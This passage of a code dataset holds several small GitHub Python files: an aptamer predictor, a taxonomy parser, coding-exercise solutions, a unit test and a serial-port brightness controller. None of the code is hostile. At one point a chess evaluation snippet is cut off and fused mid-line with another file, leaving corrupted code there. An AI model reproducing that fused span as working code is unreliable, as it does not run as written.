self.p7 = \"CTGTCTCTTATACACATCTCCGAGCCCACGAGAC\"\r\n self.null_model_aptamer_sequence = self.p5 + self.p7\r\n self.null_pseudopair_bond_strength = 0\r\n self.null_pseudopair_bond_probability = 0\r\n\r\n self.target_peptide = \"MSKGEELFTG VVPILVELDG DVNGHKFSVS GEGEGDATYG KLTLKFICTT GKLPVPWPTL VTTFSYGVQC FSRYPDHMKQ HDFFKSAMPE GYVQERTIFF 
KDDGNYKTRA EVKFEGDTLV NRIELKGIDF KEDGNILGHK LEYNYNSHNV YIMADKQKNG IKVNFKIRHN IEDGSVQLAD HYQQNTPIGD GPVLLPDNHY LSTQSALSKD PNEKRDHMVL LEFVTAAGIT HGMDELYK\"\r\n self.peptide_fragment_list = []\r\n\r\n self.peptide_fragment_and_corresponding_aptamer_tup_list = []\r\n self.desired_aptamer_length = 50\r\n\r\n self.threshold_value = 0\r\n\r\n # set to false to alter sort contingent variable\r\n self.sort_by_bond_strength = True\r\n\r\n self.programatc_iterations = 10\r\n\r\n def peptide_parser(self, desired_length):\r\n \"\"\" This function is designed to parse the given peptide into all possible sequences of the desired length.\r\n These fragments will be considered as possible locations for aptamer interaction.\r\n\r\n\r\n Input: peptide sequence\r\n Output: list of possible interaction locations\r\n \"\"\"\r\n\r\n target_peptide_stripped = self.target_peptide.replace(\" \", '')\r\n\r\n peptide_fragment_list = []\r\n for index in range(0, len(target_peptide_stripped) - desired_length):\r\n peptide_fragment_list.append(target_peptide_stripped[index:index + desired_length])\r\n\r\n return peptide_fragment_list\r\n\r\n def null_model_aptamer_value_calculator(self):\r\n \"\"\"The null model in the context of this algorithm is the result of prediction using the\r\n PCR primers alone, represented by the P5 and P7 primers. As such the null model is deterministic.\r\n\r\n Values are formed by summing the number of bonds and probabilities associated with both hydrogen bonding\r\n and pseudopairing. This develops a total bonding score.\r\n\r\n The maximum of the values developed by evaluation of all fragments is the null value. The sequence which\r\n develops the maximum total bonding score is identified and saved.\r\n\r\n Input: The primer sequence.\r\n Output: A value representing the score of the primers alone.\r\n \"\"\"\r\n\r\n null_model_peptide_fragment_list = self.peptide_parser(len(self.p5) + len(self.p7))\r\n null_model_aptamer = self.p5 + self.p7\r\n\r\n null_model_sum_list = []\r\n for peptide_fragment in null_model_peptide_fragment_list:\r\n null_model_score_list = []\r\n for i in range(len(peptide_fragment)):\r\n if peptide_fragment[i] in self.association_probability_nucleotide_to_amino_dict_dict[null_model_aptamer[i]].keys():\r\n # condense values\r\n null_model_pseudopair_data = \\\r\n self.association_probability_nucleotide_to_amino_dict_dict[null_model_aptamer[i]][peptide_fragment[i]][0]\r\n null_model_hydrogen_bond_data = \\\r\n self.association_probability_nucleotide_to_amino_dict_dict[null_model_aptamer[i]][peptide_fragment[i]][1]\r\n\r\n bond_sum_data = (null_model_pseudopair_data[0] + null_model_hydrogen_bond_data[0],\r\n null_model_pseudopair_data[1] + null_model_hydrogen_bond_data[1])\r\n\r\n null_model_score_list.append(bond_sum_data)\r\n\r\n null_model_sum_tuple = sum(i[0] for i in null_model_score_list), sum(i[1] for i in null_model_score_list)\r\n null_model_sum_list.append((self.p5 + self.p7, null_model_sum_tuple, peptide_fragment))\r\n\r\n # deterministic null model value used as threhold to determine viability of aptamer candidates by sum bond probability\r\n self.threshold_value = sum(j[1][1] for j in null_model_sum_list) / len(null_model_sum_list)\r\n\r\n def theoretical_aptamer_predictor(self):\r\n \"\"\"\r\n In developing an aptamer from the peptide sequence, the aptamer sequnce is treated as a hidden path.\r\n The peptide sequence is treated as the empirical path.\r\n\r\n As the peptide path is all that is known, the peptide to amino dictionary dictionary will be 
used.\r\n\r\n Nucleotides will be chosen by use of the probability values as weights for the random choice library function.\r\n\r\n As is similar to the means of developing the null model data, a total bonding score will be developed for each possible interaction.\r\n\r\n Input: peptide sequence.\r\n Output: aptamer sequences paired with total bonding scores.\r\n\r\n \"\"\"\r\n\r\n peptide_fragment_list = self.peptide_parser(self.desired_aptamer_length)\r\n\r\n for peptide_fragment in peptide_fragment_list:\r\n theoretical_aptamer = ''\r\n bond_prob_sum = 0\r\n total_prob_bonds = 0\r\n\r\n for i in range(0, len(peptide_fragment)):\r\n nucleotide_associated_probs_sum_list = []\r\n possible_base_list = []\r\n sum_tup_list = []\r\n\r\n if peptide_fragment[i] in self.association_probability_amino_to_nucleotide_dict_dict.keys():\r\n for possible_nucleotide in self.association_probability_amino_to_nucleotide_dict_dict[peptide_fragment[i]]:\r\n # extract sum probabilities into tuple\r\n prob_bond_tup_list = self.association_probability_amino_to_nucleotide_dict_dict[peptide_fragment[i]][possible_nucleotide]\r\n\r\n probability_sum_tup = possible_nucleotide, sum(j[0] for j in prob_bond_tup_list), sum(j[1] for j in prob_bond_tup_list)\r\n\r\n sum_tup_list.append(probability_sum_tup)\r\n\r\n possible_base_list.append(probability_sum_tup[0])\r\n\r\n nucleotide_associated_probs_sum_list.append(probability_sum_tup)\r\n\r\n base_probability_weight_tup = tuple([i[1] for i in nucleotide_associated_probs_sum_list])\r\n\r\n # use probability sums as weights to select positionally corresponding bases\r\n selected_base = random.choices(possible_base_list, weights=base_probability_weight_tup, k=1)[0]\r\n for sum_tup in sum_tup_list:\r\n if sum_tup[0] == selected_base:\r\n bond_prob_sum += sum_tup[1]\r\n total_prob_bonds += sum_tup[2]\r\n\r\n theoretical_aptamer += selected_base\r\n\r\n else:\r\n\r\n theoretical_aptamer += '-'\r\n\r\n theoretical_aptamer_tup = (theoretical_aptamer, peptide_fragment, bond_prob_sum, total_prob_bonds)\r\n\r\n self.threshhold_checker(theoretical_aptamer_tup)\r\n\r\n def threshhold_checker(self, theoretical_aptamer_tup):\r\n\r\n if theoretical_aptamer_tup[2] > self.threshold_value:\r\n self.peptide_fragment_and_corresponding_aptamer_tup_list.append((theoretical_aptamer_tup[0], theoretical_aptamer_tup[1],\r\n theoretical_aptamer_tup[2], round(theoretical_aptamer_tup[3], 3)))\r\n\r\n def print_out_results(self):\r\n self.peptide_fragment_and_corresponding_aptamer_tup_list.sort(key=lambda x: x[2], reverse=True)\r\n for tup in self.peptide_fragment_and_corresponding_aptamer_tup_list:\r\n print(tup)\r\n\r\n def driver(self):\r\n \"\"\"The purpose of this function is to drive iterations of the program.\r\n \"\"\"\r\n print(\"programatic iterations: \", self.programatc_iterations)\r\n print(\" \")\r\n\r\n # launch input collection/results GUI\r\n\r\n # find bonding strength and probability scores for primer sequences p5 and p7\r\n self.null_model_aptamer_value_calculator()\r\n\r\n for i in range(0, self.programatc_iterations):\r\n self.theoretical_aptamer_predictor()\r\n\r\n self.print_out_results()\r\n\r\n def peptide_text_box_collect(self):\r\n\r\n # Insert\r\n self.target_peptide = self.peptide_collection_text_box.get()\r\n print(self.target_peptide)\r\n\r\n def GUI(self):\r\n\r\n root_window = tk.Tk()\r\n root_window.geometry(\"1000x750\")\r\n\r\n root_window.wm_title(\"Aptamer Predictor by Quin Lamothe for Bernick Lab UCSC, 2022\")\r\n\r\n iterant_entry = tk.Entry()\r\n\r\n\r\n 
peptide_entry_label = tk.Label(text=\"Target Peptide Entry:\")\r\n self.peptide_collection_text_box = tk.Entry()\r\n peptide_entry_label.pack()\r\n self.peptide_collection_text_box.pack()\r\n\r\n peptide_collection_button = tk.Button(root_window, text=\"Enter\", command=self.peptide_text_box_collect)\r\n peptide_collection_button.pack()\r\n\r\n driver_button = tk.Button(root_window, text=\"Process\", command=self.driver)\r\n driver_button.pack()\r\n root_window.mainloop()\r\n\r\n\r\ndef main():\r\n\r\n class_access = interaction_approximator()\r\n\r\n class_access.GUI()\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"Alepidoptera7/ssDNA-Aptamer-Prediction-","sub_path":"Aptamer_Predictor.py","file_name":"Aptamer_Predictor.py","file_ext":"py","file_size_in_byte":12405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"12256994723","text":"from setuptools import setup, find_packages\nimport os, shutil\n\nCUR_PATH = os.path.dirname(os.path.abspath(__file__))\npath = os.path.join(CUR_PATH, 'build')\nif os.path.isdir(path):\n print('INFO del dir ', path) \n shutil.rmtree(path)\n\n# setuptools.setup(\n# name=\"myfunc\",\n# version=\"0.1.3\",\n# author=\"Minghao GUO\",\n# author_email=\"zjugmh@zju.edu.cn\",\n# description=\"some functions I use frequently\",\n# py_modules=['myfunc'],\n# )\n\nsetup(\n name=\"myfunc\",\n version=\"0.1.4\",\n author=\"Minghao GUO\",\n author_email=\"ihenrykwok@outlook.com\",\n description=\"some functions I use frequently\",\n packages=['myfunc'],\n install_requires=[],\n)","repo_name":"minghaoguo20/myfunc","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23571866401","text":"import math\n\nt = int(input())\nfor t in range(t):\n\tn,k = tuple(map(int, input().split(' ')))\n\tstalls = [[0, math.floor((n+1) / 2), n+1]]\n\t#occupied = [False] * (n+2)\n\t#occupied[0] = occupied[n+1] = True\n\t#occupied[buckets[0][1]] = True\n\n\tfor i in range(k-1):\n\t\tcandidates = []\n\t\tfor l,m,r in stalls:\n\t\t\tcandidates.append([l, math.floor((l+m) / 2), m])\n\t\t\tcandidates.append([m, math.floor((r+m) / 2), r])\n\n\t\t_l = None\n\t\t_r = None\n\t\tcurr_best = None\n\t\tfor l,m,r in candidates:\n\t\t\tif (curr_best == None) \\\n\t\t\t\tor min(m-l-1, r-m-1) > _l:\n\t\t\t\t_l = min(m-l-1, r-m-1)\n\t\t\t\t_r = max(m-l-1, r-m-1)\n\t\t\t\tcurr_best = [l,m,r]\n\t\t\telif min(m-l-1, r-m-1) == _l and max(m-l-1, r-m-1) > _r:\n\t\t\t\t_r = max(m-l-1, r-m-1)\n\t\t\t\tcurr_best = [l,m,r]\n\n\t\tfor s in stalls:\n\t\t\tif curr_best[1] < s[1] and s[0] < curr_best[1]: s[0] = curr_best[1]\n\t\t\tif curr_best[1] > s[1] and s[2] > curr_best[1]: s[2] = curr_best[1]\n\n\t\tstalls.append(curr_best)\n\n\tl,m,r = stalls[-1]\n\t_l = max(m-l-1, r-m-1)\n\t_r = min(m-l-1, r-m-1)\n\n\tprint('Case #%d: %d %d' % (t+1, _l, _r))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2951.py","file_name":"2951.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8593472901","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport argparse\nimport logging\n\nfrom ncbitools import __author__, __email__, __version__\n\n__all__ = []\n\nLOG = logging.getLogger(__name__)\n\n\nclass Tax(object):\n\n __slots__ = [\"id\", \"name\", \"parent\", \"rank\"]\n\n def __init__(self):\n self.id = None\n self.name = None\n self.parent = None\n self.rank = {}\n\n\ndef read_tbl(file, sep=\"\\t\"):\n\n for line in open(file):\n line = line.strip()\n\n if line.startswith(\"#\"):\n continue\n\n if line:\n yield line.split(sep)\n\n\ndef read_names_dmp(file, name_class_filter=\"scientific name\"):\n \"\"\"\n read names.dmp and return a dict of tax_id and it's scientific name\n\n names.dmp contains:\n tax_id\t\t\t\t\t-- the id of node associated with this name\n name_txt\t\t\t\t-- name itself\n unique name\t\t\t\t-- the unique variant of this name if name not unique\n name class\t\t\t\t-- (synonym, common name, ...)\n\n :param file:\n :param name_class_filter:\n :return:\n \"\"\"\n\n r = {}\n LOG.info(\"Parsing tax names from %r\" % file)\n\n for line in read_tbl(file):\n tax_id, _, name_txt, _, unique_name, _, name_class, _ = line\n\n if name_class != name_class_filter:\n continue\n\n r[tax_id] = name_txt\n\n return r\n\n\ndef read_nodes_dmp(file):\n \"\"\"\n tax_id\t\t\t\t\t-- node id in GenBank taxonomy database\n parent tax_id\t\t\t\t-- parent node id in GenBank taxonomy database\n rank\t\t\t\t\t-- rank of this node (superkingdom, kingdom, ...)\n embl code\t\t\t\t-- locus-name prefix; not unique\n division id\t\t\t\t-- see division.dmp file\n inherited div flag (1 or 0)\t\t-- 1 if node inherits division from parent\n genetic code id\t\t\t\t-- see gencode.dmp file\n inherited GC flag (1 or 0)\t\t-- 1 if node inherits genetic code from parent\n mitochondrial genetic code id\t\t-- see gencode.dmp file\n inherited MGC flag (1 or 0)\t\t-- 1 if node inherits mitochondrial gencode from parent\n GenBank hidden flag (1 or 0) -- 1 if name is suppressed in GenBank entry lineage\n hidden subtree root flag (1 or 0) -- 1 if this subtree has no sequence data yet\n comments\t\t\t\t-- free-text comments and citations\n\n :param file:\n :return:\n \"\"\"\n\n r = {}\n LOG.info(\"Parsing tax nodes from %r\" % file)\n\n for line in read_tbl(file):\n tax_id = line[0]\n parent = line[2]\n rank = line[4]\n\n r[tax_id] = [parent, rank]\n\n return r\n\n\ndef merge_dmp(names_dmp, nodes_dmp):\n \"\"\"\n\n :param names_dmp:\n :param nodes_dmp:\n :return: a dict contains {tax_id: [name_txt, parent, rank]}\n \"\"\"\n\n r = {}\n\n names = read_names_dmp(names_dmp)\n nodes = read_nodes_dmp(nodes_dmp)\n\n for n in nodes:\n r[n] = [names[n]] + nodes[n]\n\n return r\n\n\ndef get_rank(database, tax_id, tax):\n\n if tax_id not in database:\n return 0\n\n name, parent, rank = database[tax_id]\n\n if parent == tax_id:\n return tax\n\n tax.rank[rank] = name\n\n get_rank(database, parent, tax)\n\n\ndef get_taxons(names_dmp, nodes_dmp, tax_ids, ranks):\n\n database = merge_dmp(names_dmp, nodes_dmp)\n print(\"\\t\".join([\"tax_id\"] + ranks))\n\n for i in read_tbl(tax_ids):\n LOG.info(\"Parsing tax of %s\" % i[0])\n tax = Tax()\n tax.id = i[0]\n get_rank(database, i[0], tax)\n\n r = [i[0]]\n\n for j in ranks:\n\n if j in tax.rank:\n r.append(tax.rank[j])\n else:\n r.append(\"\")\n\n print(\"\\t\".join(r))\n\n\ndef set_args():\n\n args = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\ndescription:\n\nversion: %s\nauthor: 
%s\nemail: %s\n \"\"\" % (__version__, \" \".join(__author__), __email__))\n\n args.add_argument(\"file\", help=\"file contains tax id per line\")\n args.add_argument(\"--names\", default=\"names.dmp\", help=\"path of names.dmp download from NCBI\")\n args.add_argument(\"--nodes\", default=\"nodes.dmp\", help=\"path of nodes.dmp download from NCBI\")\n args.add_argument(\"--ranks\", default=\"superkingdom,kingdom,phylum,class,order,family,genus,species\",\n help=\"ranks to show in the result, \"\n \"default: 'superkingdom,kingdom,phylum,class,order,family,genus,species' \")\n\n return args.parse_args()\n\n\ndef main():\n args = set_args()\n\n logging.basicConfig(\n stream=sys.stderr,\n level=logging.INFO,\n format=\"[%(levelname)s] %(message)s\"\n )\n\n get_taxons(args.names, args.nodes, args.file, args.ranks.split(\",\"))\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"FlyPythons/NCBITools","sub_path":"ncbitools/get_taxon.py","file_name":"get_taxon.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11861266069","text":"import sys\n# 재귀 허용 깊이를 수동으로 늘려주는 코드\nsys.setrecursionlimit(10**6) \n# 정점의 수, 간선의 수\nn, m = map(int, input().split())\n# 연결노드 그래프 초기화(노드와 인덱스를 같게 하기 위해서 n+1로)\ngraph = [[] for _ in range(n+1)]\n# 방문 순서 그래프 (이것도 노드와 인덱스를 같게 하기 위해)\nvisited = [False] * (n+1)\n\ndef dfs(graph, v, visited):\n visited[v] = True\n print(v, end=' ')\n for i in graph[v]:\n if not visited[i]:\n dfs(graph, i, visited)\n\nfor _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\n\nfor i in range(n+1):\n graph[i].sort()\n\ndfs(graph, 1, visited)\n\n\"\"\"\n깊이 우선 탐색이란 그래프를 탐색(또는 순회)하는 방법 중 하나입니다. \n\n\n\n깊이 우선 탐색은 다음과 같은 방식으로 이루어집니다. \n\n\n\n1. 정점을 하나 정하여 방문하였다고 표시합니다. \n\n2. 이 정점과 간선으로 연결된 다른 정점에 대하여, \n\n2-1. 이미 방문했던 정점이라면 무시합니다. \n\n2-2. 아직 방문하지 않은 정점이라면 그 정점부터 다시 1을 적용합니다. \n\n\n\n이를 의사코드로 작성하면 다음과 같게 됩니다. \n\n\n\nfunction DFS(V, E, C) { // V : 정점의 집합, E : 간선의 집합, C : 현재 방문할 정점\n\n visited[C] = true // 현재 정점을 방문하였다고 표시\n\n for each x in E(C) { // E(C) : C와 인접한 정점\n\n if (!visited[x]) DFS(V, E, x) // 아직 방문하지 않은 정점이면 해당 정점부터 깊이 우선 탐색\n\n }\n\n}\n\n\n\n방향성과 가중치가 없는 그래프가 주어졌을 때 정점 1에서부터 깊이 우선 탐색을 수행하는 프로그램을 작성해주세요. \n\n\n\n탐색은 인접한 정점 중에서 정점번호가 작은 정점부터 수행합니다. \n\n정점의 개수가 N개일 때 각 정점의 번호는 1부터 N까지입니다.\n\n\n예제 입력1\n\n3 0\n\n예제 출력1\n\n1\n\n예제 입력2\n\n5 3\n1 4\n2 3\n4 5\n\n예제 출력2\n\n1 4 5\n\n입력값 설명\n\n첫째 줄에 정점의 개수 N과 간선의 개수 M이 입력됩니다. (1≤N, 0≤M≤1,000)\n둘째 줄부터 M + 1번째 줄까지 정수 A와 B가 입력됩니다. (1 ≤ A, B ≤ 1,000) 이 때 각 줄은 A와 B가 서로 연결되었음을 의미합니다.\n\n출력값 설명\n\n정점 1에서 깊이 우선 탐색을 수행한 결과를 공백으로 구분하여 출력합니다.\n\"\"\"","repo_name":"namoo1818/CodingMastars","sub_path":"4320 깊이 우선 탐색.py","file_name":"4320 깊이 우선 탐색.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13227043568","text":"import numpy as np\r\nfrom Source import Chessboard\r\nWeight = {True:np.array((1.0,1.05,1.1,1.15,1.2,1.2,1.2,1.2)),False:np.array((1.2,1.2,1.2,1.2,1.15,1.1,1.05,1.0))}\r\n\r\n\r\ndef getmark(board:Chessboard, isFirst:bool):\r\n \"评估函数\"\r\n Value, Belong = np.array(board.getRaw(),).transpose((2,0,1))\r\n Belong ^= isFirst\r\n Ours = Belong< 90:\n print(f\"Your score is **{total_count}**, you go together like coke and mentos.\")\nelif int(total_count) > 39 and int(total_count) < 51:\n print(f\"Your score is **{total_count}**, you are alright together.\")\nelse:\n print(f\"Your score is **{true_count}{love_count}**.\")\n","repo_name":"dielenko/python-code-contents","sub_path":"100-days-of-code-python-exercise/love-calculator-program/love_calculator_program.py","file_name":"love_calculator_program.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16767659290","text":"# 문제출처: https://www.acmicpc.net/problem/10828\n\ndef enter_count():\n try:\n count = int(input())\n except ValueError:\n return enter_count()\n\n if count >= 1 and count <=10000:\n return count\n else:\n return enter_count()\n\ndef enter_command():\n try:\n command = input()\n return command\n except ValueError:\n return enter_command()\n\ndef push(stack, input_command):\n command, num = input_command.split()\n if command == 'push':\n return num\n else:\n return -1\n\ndef pop(stack):\n if len(stack) == 0:\n print(-1)\n else:\n print(stack.pop())\n\ndef size(stack):\n print(len(stack))\n\ndef empty(stack):\n if len(stack) == 0:\n print(1)\n else:\n print(0)\n\ndef top(stack):\n if len(stack) == 0:\n print(-1)\n else:\n print(stack[-1])\n \nif __name__ == \"__main__\":\n s = []\n cnt = enter_count()\n\n while cnt != 0:\n cmd = enter_command()\n\n if cmd == 'pop':\n pop(s)\n elif cmd == 'size':\n size(s)\n elif cmd == 'empty':\n empty(s)\n elif cmd == 'top':\n top(s)\n else:\n num = push(s, cmd)\n if num == -1:\n continue\n else:\n s.append(num)\n\n cnt -= 1","repo_name":"yooooujin/algorithm-study","sub_path":"archive/10828/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26970678718","text":"from unittest.mock import Mock\nfrom tagesschauscraper.retrieve import WebsiteTest\nfrom requests import Response\nimport pytest\n\n\n@pytest.fixture\ndef response_mock() -> Response:\n responseMock = Mock(spec=Response)\n responseMock.status_code = 200\n with open(\"tests/data/teaser-snippet.html\", \"r\") as f:\n responseMock.text = f.read()\n return responseMock\n\n\ndef test_is_element(response_mock: Response) -> None:\n websiteTest = WebsiteTest(response_mock)\n assert websiteTest.is_element(\n attrs={\"class\": \"teaser-xs__headline-wrapper\"}\n )\n\n\ndef test_is_text_in_element(response_mock: Response) -> None:\n websiteTest = WebsiteTest(response_mock)\n text = \"Nordstream-Betreiber offenbar insolvent\"\n attrs = {\"class\": \"teaser-xs__headline-wrapper\"}\n assert websiteTest.is_text_in_element(target_text=text, attrs=attrs)\n","repo_name":"TheFerry10/TagesschauScraper","sub_path":"tests/unit/test_retrieve.py","file_name":"test_retrieve.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20245528075","text":"\r\nimport serial\r\nimport screen_brightness_control as sbc\r\nimport math\r\nfrom threading import Thread\r\nfrom tkinter import Tk, Button, Label, Frame, ttk, DoubleVar, messagebox\r\nimport csv\r\n\r\nclass GUI(Frame):\r\n def create_widgets(self):\r\n self.Label1 = Label(self,text = \"Brightness : \")\r\n self.Label1.grid(row = 0, column = 0, sticky = \"w\")\r\n self.Label2 = Label(self,text = \"Distance :\")\r\n self.Label2.grid(row = 1, column = 0, sticky = \"w\")\r\n self.Label3 = Label(self,text = \"Ambient Brightness :\")\r\n self.Label3.grid(row = 2, column = 0, sticky = \"w\")\r\n self.Label4 = Label(self,text = \"Set Value :\")\r\n self.Label4.grid(row = 3, column = 0, sticky = \"w\")\r\n self.Label5 = Label(self,text = \"Brightness Difference : \")\r\n self.Label5.grid(row = 4, column = 0, sticky=\"w\")\r\n self.Label6 = Label(self,text = \"Time Lapsed : \")\r\n self.Label6.grid(row = 5, column = 0, sticky=\"w\")\r\n self.board = None\r\n self.current_value = DoubleVar()\r\n self.current_value.set(50.0)\r\n self.slider_label = ttk.Label(\r\n self,\r\n text='Slider:'\r\n )\r\n\r\n self.slider_label.grid(\r\n column=0,\r\n row=7,\r\n sticky='w'\r\n )\r\n\r\n # slider\r\n self.slider = ttk.Scale(\r\n self,\r\n from_=0,\r\n to=100,\r\n orient='horizontal', # vertical\r\n command=self.slider_changed,\r\n variable=self.current_value,\r\n value = 50.0\r\n )\r\n\r\n self.slider.grid(\r\n column=1,\r\n row=7,\r\n sticky='we'\r\n )\r\n\r\n # current value label\r\n self.current_value_label = ttk.Label(\r\n self,\r\n text='Current Brightness:'\r\n )\r\n\r\n self.current_value_label.grid(\r\n row=8,\r\n columnspan=2,\r\n sticky='n',\r\n ipadx=10,\r\n ipady=10\r\n )\r\n\r\n # value label\r\n self.value_label = ttk.Label(\r\n self,\r\n text=self.get_current_value()\r\n )\r\n self.value_label.grid(\r\n row=9,\r\n columnspan=2,\r\n sticky='n'\r\n )\r\n self.count = -1\r\n self.time = 0\r\n self.run = False\r\n self.set_val = 0.0\r\n self.saved_data = []\r\n self.control_flag = True\r\n self.save_flag = True\r\n self.start = Button(self, text='Start',width=25, command=lambda: Thread(target=self.Start).start())\r\n self.stop = Button(self, text='Stop', width=25, state='disabled', command=self.Stop)\r\n self.reset = Button(self, text='Reset&Save',width=25, state='disabled', command = self.Reset)\r\n self.control = Button(self, text=\"Brighness Ctrl : ON\", width=25, state='normal', command=self.enable_control)\r\n self.save = Button(self, text=\"Save Data: ON\", width=25, state='normal', command=self.enable_save)\r\n self.start.grid(row = 6, column = 0)\r\n self.stop.grid(row = 6, column = 1)\r\n self.reset.grid(row = 6, column = 2)\r\n self.control.grid(row=6,column=3)\r\n self.save.grid(row=6,column=4)\r\n \r\n def enable_control(self):\r\n if self.control_flag :\r\n self.control['text'] = \"Brighness Ctrl : OFF\"\r\n self.control_flag = False\r\n else :\r\n self.control['text'] = \"Brighness Ctrl : ON\"\r\n self.control_flag = True\r\n\r\n def enable_save(self):\r\n if self.save_flag :\r\n self.save['text'] = \"Save Data: OFF\"\r\n self.save_flag = False\r\n else :\r\n self.save['text'] = \"Save Data: ON\"\r\n self.save_flag = True\r\n\r\n def get_current_value(self):\r\n return self.current_value.get()\r\n\r\n\r\n def slider_changed(self,event):\r\n self.value_label.configure(text='{: .2f}'.format(self.get_current_value()))\r\n brightness = int(self.get_current_value())\r\n sbc.set_brightness(brightness)\r\n \r\n def time_convert(self):\r\n mins = self.time 
// 60\r\n sec = self.time % 60\r\n hours = mins // 60\r\n mins = mins % 60\r\n text = \"Time Lapsed = {0}:{1}:{2}\".format(int(hours),int(mins),sec)\r\n return text\r\n\r\n def brightness_control(self,LDR_r,Length,diff) :\r\n if Length > 40 :\r\n Length = 40\r\n coef= 7.14407 - 0.2038*Length \r\n grad = 0.00043*pow(Length,2) - 0.0623*Length + 2.52317\r\n brightness_diff = (diff-coef)/grad\r\n if brightness_diff < 0 :\r\n brightness_diff = 0\r\n if LDR_r 100 :\r\n brightness = 100\r\n self.value_label['text'] = brightness\r\n sbc.set_brightness(brightness)\r\n elif LDR_r > self.set_val+2 and LDR_r!=0 :\r\n cur_brightness = sbc.get_brightness()\r\n brightness = int(cur_brightness-brightness_diff)\r\n if brightness < 0 :\r\n brightness = 0\r\n self.value_label['text'] = brightness\r\n sbc.set_brightness(brightness)\r\n\r\n def var_name(self):\r\n while self.run:\r\n try :\r\n ser = str(self.board.readline())\r\n data = ser.split(\",\")\r\n LDR_r = float(data[1])\r\n Length = float(data[2])\r\n Ambient_r = float(data[3])\r\n diff = math.fabs(LDR_r - self.set_val)\r\n if self.count <= 3:\r\n show1 = \"Starting\"\r\n show2 = \"Starting\"\r\n show3 = \"Starting\"\r\n show4 = \"Starting\"\r\n show5 = \"Starting\"\r\n show6 = \"Starting\"\r\n self.set_val += LDR_r\r\n self.Label5['text'] = show5\r\n if self.count == 3:\r\n self.set_val = self.set_val/5\r\n self.Label5['text'] = \"Set Value : %f lux\" % self.set_val\r\n else:\r\n show1 = \"Brightness : %f lux\" % LDR_r\r\n show2 = \"Distance : %f cm\" % Length\r\n show3 = \"Ambient Brightness : %f lux\" % Ambient_r\r\n show4 = \"Brightness Difference : %f \" % diff\r\n show6 = self.time_convert()\r\n self.time += 1\r\n self.Label1['text'] = show1\r\n self.Label2['text'] = show2\r\n self.Label3['text'] = show3\r\n self.Label4['text'] = show4\r\n self.Label6['text'] = show6\r\n #Increment the count after\r\n #every 1 second\r\n if self.count>3 and self.control_flag and self.save_flag:\r\n self.brightness_control(LDR_r,Length,diff)\r\n data = [self.time,LDR_r,Length,Ambient_r,self.set_val]\r\n self.saved_data.append(data)\r\n elif self.count>3 and self.control_flag and not(self.save_flag):\r\n self.brightness_control(LDR_r,Length,diff)\r\n elif not(self.control_flag) and self.save_flag :\r\n data = [self.time,LDR_r,Length,Ambient_r,self.set_val]\r\n self.saved_data.append(data)\r\n self.count += 1\r\n except :\r\n self.run=False\r\n\r\n\r\n\r\n # While stopped\r\n def Stop(self):\r\n self.slider['state']='normal'\r\n self.start['state'] = 'normal'\r\n self.stop['state'] = 'disabled'\r\n self.reset['state'] = 'normal'\r\n self.control['state'] = 'normal'\r\n self.save['state'] = 'normal'\r\n self.run = False\r\n self.count = -1\r\n if self.board != None :\r\n self.board.close()\r\n\r\n def Write_data(self):\r\n header = [\"Time (s)\",\"Brightness (lx)\",\"Distance (cm)\",\"Ambient Brightness (lx)\",\"Set Value(lx)\"]\r\n if self.control_flag :\r\n filename = \"Controlled_Data.csv\"\r\n else :\r\n filename = \"Uncontrolled_Data.csv\"\r\n with open (filename, 'w', encoding='UTF8', newline='') as f:\r\n writer = csv.writer(f)\r\n writer.writerow(header)\r\n writer.writerows(self.saved_data)\r\n\r\n # For Reset\r\n def Reset(self):\r\n self.count = -1\r\n self.set_val = 0\r\n self.reset['state'] = 'disabled'\r\n self.Label1['text'] = \"Brightness : \"\r\n self.Label2['text'] = \"Distance : \"\r\n self.Label3['text'] = \"Ambient Brightness : \"\r\n self.Label4['text'] = \"Brightness Difference : \"\r\n self.Label5['text'] = \"Set Value : \"\r\n 
self.Label6['text'] = \"Time Lapsed : \"\r\n if self.save_flag :\r\n self.Write_data()\r\n self.saved_data.clear()\r\n\r\n\r\n\r\n\r\n # While Running\r\n def Start(self):\r\n try :\r\n self.board = serial.Serial('COM5', 9600, timeout = 1)\r\n self.run = True\r\n self.start['state'] = 'disabled'\r\n self.stop['state'] = 'normal'\r\n self.reset['state'] = 'disabled'\r\n self.slider['state'] = 'disabled'\r\n self.control['state'] = 'disabled'\r\n self.save['state'] = 'disabled'\r\n self.var_name()\r\n except :\r\n messagebox.showerror(\"Error\", \"Device Tidak Terdeteksi !!\")\r\n self.start['state'] = 'normal'\r\n self.stop['state'] = 'disabled'\r\n self.reset['state'] = 'disabled'\r\n self.slider['state'] = 'normal'\r\n pass\r\n \r\n def __init__(self, master = None):\r\n Frame.__init__(self, master)\r\n self.create_widgets()\r\n self.grid()\r\n\r\nroot = Tk()\r\napp = GUI(master = root)\r\napp.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n 